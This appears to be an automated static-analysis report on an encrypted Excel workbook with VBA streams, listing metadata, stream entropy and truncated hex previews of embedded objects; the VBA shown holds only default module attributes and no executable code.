                                                                                                                                                                              Application Name:Microsoft Excel
                                                                                                                                                                              Encrypted Document:True
                                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                                              Contains Workbook/Book Stream:True
                                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                                              Contains ObjectPool Stream:False
                                                                                                                                                                              Flash Objects Count:0
                                                                                                                                                                              Contains VBA Macros:True
                                                                                                                                                                              Summary
                                                                                                                                                                              Code Page:1252
                                                                                                                                                                              Author:
                                                                                                                                                                              Last Saved By:
                                                                                                                                                                              Create Time:2006-09-16 00:00:00
                                                                                                                                                                              Last Saved Time:2024-10-14 05:22:49
                                                                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                                                                              Security:1
                                                                                                                                                                              Document Summary
                                                                                                                                                                              Document Code Page:1252
                                                                                                                                                                              Thumbnail Scaling Desired:False
                                                                                                                                                                              Contains Dirty Links:False
                                                                                                                                                                              Shared Document:False
                                                                                                                                                                              Changed Hyperlinks:False
                                                                                                                                                                              Application Version:786432

                                                                                                                                                                              Streams with VBA

                                                                                                                                                                              VBA File Name: Sheet1.cls, Stream Size: 977
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                                              VBA File Name:Sheet1.cls
                                                                                                                                                                              Stream Size:977
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1e 0f ae aa 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              VBA Code
                                                                                                                                                                              Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                              VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                                              VBA File Name:Sheet2.cls
                                                                                                                                                                              Stream Size:977
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1e 0f 4a 98 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              VBA Code
                                                                                                                                                                              Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                              VBA File Name: Sheet3.cls, Stream Size: 977
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                                                              VBA File Name:Sheet3.cls
                                                                                                                                                                              Stream Size:977
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1e 0f ac d0 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              VBA Code
                                                                                                                                                                              Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                              VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                                              VBA File Name:ThisWorkbook.cls
                                                                                                                                                                              Stream Size:985
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - v . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 .
                                                                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1e 0f 2d 76 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              VBA Code
                                                                                                                                                                              Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                              Streams

                                                                                                                                                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:\x1CompObj
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:114
                                                                                                                                                                              Entropy:4.25248375192737
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:244
                                                                                                                                                                              Entropy:2.889430592781307
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:200
                                                                                                                                                                              Entropy:3.2920681057018664
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/\x1CompObj
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:114
                                                                                                                                                                              Entropy:4.25248375192737
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/\x5DocumentSummaryInformation
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:244
                                                                                                                                                                              Entropy:2.701136490257069
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", Stream Size: 90976
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/\x5SummaryInformation
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                                                                                                              Stream Size:90976
                                                                                                                                                                              Entropy:2.0342284920522364
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . ? # s . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A .
                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0018D4CE/\x1Ole
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:20
                                                                                                                                                                              Entropy:0.5689955935892812
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0018D4CE/\x3ObjInfo
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:4
                                                                                                                                                                              Entropy:0.8112781244591328
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:. . . .
                                                                                                                                                                              Data Raw:00 00 03 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0018D4CE/Contents
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                                                                                                              Stream Size:197671
                                                                                                                                                                              Entropy:6.989042939766534
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/MBD00253C98/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD00253C98/\x1CompObj
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:114
                                                                                                                                                                              Entropy:4.219515110876372
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/MBD00253C98/Package, File Type: Microsoft Excel 2007+, Stream Size: 18455
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD00253C98/Package
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                                                              Stream Size:18455
                                                                                                                                                                              Entropy:7.496042748332497
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:P K . . . . . . . . . . ! . 3 [ . . . H . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 33 c0 d5 5b 93 01 00 00 48 06 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/MBD00254B5A/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD00254B5A/\x1CompObj
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:114
                                                                                                                                                                              Entropy:4.219515110876372
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/MBD00254B5A/Package, File Type: Microsoft Excel 2007+, Stream Size: 22238
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD00254B5A/Package
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                                                              Stream Size:22238
                                                                                                                                                                              Entropy:7.613241301603683
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:P K . . . . . . . . . . ! . . z > . . . 8 . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c1 0c 7a 3e 86 01 00 00 38 05 00 00 13 00 cd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/MBD0025715C/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0025715C/\x1CompObj
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:114
                                                                                                                                                                              Entropy:4.25248375192737
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/MBD0025715C/\x5DocumentSummaryInformation, File Type: data, Stream Size: 484
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0025715C/\x5DocumentSummaryInformation
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:484
                                                                                                                                                                              Entropy:3.922883556049869
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 01 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/MBD0025715C/\x5SummaryInformation, File Type: data, Stream Size: 19956
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0025715C/\x5SummaryInformation
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:19956
                                                                                                                                                                              Entropy:3.0467651148991917
                                                                                                                                                                              Base64 Encoded:True
